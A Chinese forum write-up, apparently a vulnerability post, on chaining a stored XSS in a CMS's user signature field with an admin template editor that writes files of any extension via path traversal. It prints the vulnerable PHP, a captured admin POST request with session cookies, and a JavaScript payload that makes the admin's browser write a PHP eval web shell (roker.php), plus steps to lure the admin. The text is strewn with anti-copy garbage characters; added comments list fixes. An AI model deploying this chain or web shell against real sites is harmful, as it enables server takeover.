这个 cms 以前 90 有人发了个 getshell，当时是后台验证文件的问题；
官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 xss。
漏洞文件 user/member/skin_edit.php
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
0 `/ z8 k" g/ t6 r8 Y. g! L & L9 f' C, O, I: H
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
# x% A3 G6 F6 i' s" ?- ^" {$ {
, P, s5 h5 O% r( q</textarea></td></tr>+ ]( {2 v1 f1 I" m2 p9 `
# }& }1 J G$ k x* i& X- {
user/do.php
- E- l! ?/ B, B7 D; N7 C& o: D
* o. i4 z) e- S% o9 V. J+ oif($op=='zl'){ //资料
% q1 ?2 F" r. ?) e
5 U* G7 P& r& T$ l t( a if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
8 o& K! j+ h8 S( o exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
- a% d# A$ f; U ( [" Q; c8 s' y! W P) V: N( ?
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',4 V, m" v# Y% N) x$ o2 t
6 G$ y3 q; S2 @- o CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'8 L% Z6 u: P7 |* Y0 J
where CS_Name='".$cscms_name."'";9 C3 R! o2 E- [
: r3 D: V5 L- Z( c; v! U if($db->query($sql)){% M; v4 b! }+ J$ ]- [
l m, y$ l5 t% _; v+ S
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
: F6 c5 n; A9 S& l
. L" }' }& J0 C, l }else{
4 g* H, V {' N+ d: y \ 2 E+ i* B: M$ j2 |. e
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));2 f3 m$ o: J( B2 Q. }, i3 ^
. ?; D9 x+ Q. o' X% A( S
}5 t6 w$ U- H8 h& T/ w/ f) y
4 v, \" A( S- e7 g& F6 S1 s
没有过滤导致 xss 产生（签名 CS_Qianm 在 do.php 里直接拼进 sql 入库，在 skin_edit.php 里又直接 echo 输出，两头都没有转义）。
后台看了下，很奇葩的是可以写任意格式文件。。
抓包。。
3 l" G+ | Z& X
5 j9 ]; W; \. L6 A; e1 v
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.12 x0 H/ h4 U0 K6 g; `& F
+ K# ?, O0 t5 n+ \6 ~; k) J8 c# r
Accept: text/html, application/xhtml+xml, */*0 V, _$ K. N8 j; m) W8 D( M
) X* W: `3 F6 O' F0 \' M# \
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php8 R! C+ S& A; {7 ^, Q
$ G; a: H0 A& O: T8 {, [& dAccept-Language: zh-CN
* x; F, j# J P, s: B 0 g4 B3 x& ^# }5 @8 c8 _
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
9 V. C0 \( Y: ?1 |* u/ i+ X
9 l0 @" W1 [# j. E6 K' E# Q% k9 w0 WContent-Type: application/x-www-form-urlencoded
7 k8 ]) u$ D4 s " i* k( |5 @9 M4 R. Z" G
Accept-Encoding: gzip, deflate- W, C. ]; R. k$ a8 _" R
$ K9 R4 e* a( u9 [
Host: 127.0.0.12 c8 x7 u' T* j) Z. I# t9 _' A
8 `/ M" {! r/ ]" X4 d
Content-Length: 38% v: G( y% J) ~' \% F0 A
/ I% h( X; i: dDNT: 13 h& K' S$ k. f" g
, |8 R$ b, E+ ~
Connection: Keep-Alive6 a) \0 z4 F8 @: y
s0 \4 G' K2 ^# W- i: ^2 h0 w
Cache-Control: no-cache3 Z8 K t3 N+ `1 M9 x4 s7 |, w
1 {8 G! B7 _$ v3 Y" `, WCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
& b% i' |. c6 O) z v/ G9 m2 C2 j! [$ N& X9 t; x2 a; g
/ k8 I+ ]: P% @4 n3 U& ]
name=aaa.php&content=%3Cs%3E%3Ca%25%3E- {( }8 r" ]6 {" |4 L
3 k& y. Q% n5 C; X* ^6 i
$ V% m+ M3 T) n4 z+ s3 B
于是构造 js 如下。
; O/ J) ~/ J) w0 n" V
本帖隐藏的内容<script> 2 t8 J& [' y7 G. K
// Payload as posted in the writeup (kept verbatim, anti-copy noise included).
// What it shows a defender: once this stored-XSS snippet renders in an
// admin's browser, it auto-submits a hidden form to the template editor
// (admin/skins/skins.php) and the browser attaches the admin's own cookies,
// so it is a CSRF on top of the XSS. The captured request above carries no
// anti-CSRF token, accepts an arbitrary `name` extension and a `path`
// containing `../`. Fixes: escape CS_Qianm on output, allowlist template
// extensions, reject `..` in path, require a per-session token on skins.php.
// Note `thisTHost` is assigned without var/let — an implicit global.
thisTHost = top.location.hostname;
2 W' ]/ b4 r6 `* ` + |# a- J3 J- Z3 w4 ^2 n$ O
// Target URL is built from the victim's own hostname, so the same snippet
// works wherever the vulnerable CMS is hosted.
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
D7 U u( Z4 N8 o( z4 G( u1 ? " O( Y+ B6 q ^/ S7 X7 i
/**
 * Builds a hidden POST form with exactly the two fields the captured request
 * shows skins.php consuming (`name`, `content`) and submits it.
 * @param {string} url  - form action (the skins.php URL above)
 * @param {string} data - value sent as the `name` field
 * @param {string} msg  - value sent as the `content` field
 * Detection hint (inferred, confirm in logs): a POST to admin/skins/skins.php
 * whose Referer is a user-side page such as home/ or user/space.php rather
 * than the admin skin editor.
 */
function PostSubmit(url, data, msg) { / m' c( R. @$ e- g% t7 q5 r
var postUrl = url;
, Y$ ~0 H% \; n
( I' V% h6 {6 F% G/ _3 P J var postData = data;
8 K2 M( Z1 B( u2 v3 k var msgData = msg; 6 B4 R( V! K( |6 Z
// Form is attached to the document so that submit() fires a real
// top-level navigation request with the session cookies.
var ExportForm = document.createElement("FORM"); u8 c b7 Z' l# z$ S
document.body.appendChild(ExportForm); ( j/ A ]4 w! T+ @* n% {$ C
ExportForm.method = "POST";
- p n% ?+ T0 ^% M9 Z2 c var newElement = document.createElement("input"); ( w% e6 }7 o3 ^6 }
newElement.setAttribute("name", "name"); 9 F" q1 s1 i% y1 d- m, A
newElement.setAttribute("type", "hidden"); , Q( x* V# Z4 g& |
var newElement2 = document.createElement("input"); & \4 S' @# C. X- ~
newElement2.setAttribute("name", "content"); - }) ]' I: ~: o5 c
newElement2.setAttribute("type", "hidden"); $ O" s1 k( i9 r+ \$ e( A0 K
ExportForm.appendChild(newElement); ( {* }) h! s! g3 q1 J
ExportForm.appendChild(newElement2);
3 _+ V6 X, m7 ^, J5 F; m newElement.value = postData; 1 A. {+ K6 v. q2 t: t
newElement2.value = msgData;
/ \# m1 B. l' v' L+ Y. D: s ExportForm.action = postUrl; 5 r! ]4 H* ?% |. H* B( I
ExportForm.submit();
~$ A; h' {9 ]( ^( ^* t2 l};
* s+ E$ l9 j$ C + L5 t# r @, N. e
// Call site as posted: `name` becomes the file written under the template
// directory and `content` its body — the server-side extension allowlist
// and CSRF token are what should stop this, not output filtering alone.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
( p9 V6 p0 O4 B# M3 O2 u : n: s" Y& c7 }' i! i
</script>
+ S% b! f- [# \, L0 Z3 a* m& ^3 W7 y2 E; \
1 g' h. t* L" \' C+ R' C
9 a' s8 G6 d# ^3 [4 Ohttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
, ?. H- [9 h9 C2 V用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)' T& p8 U2 a4 ?: Z4 `
就会 在 skins\index\html\目录下生成 roker.php 一句话。 | , m2 \* v0 p+ V m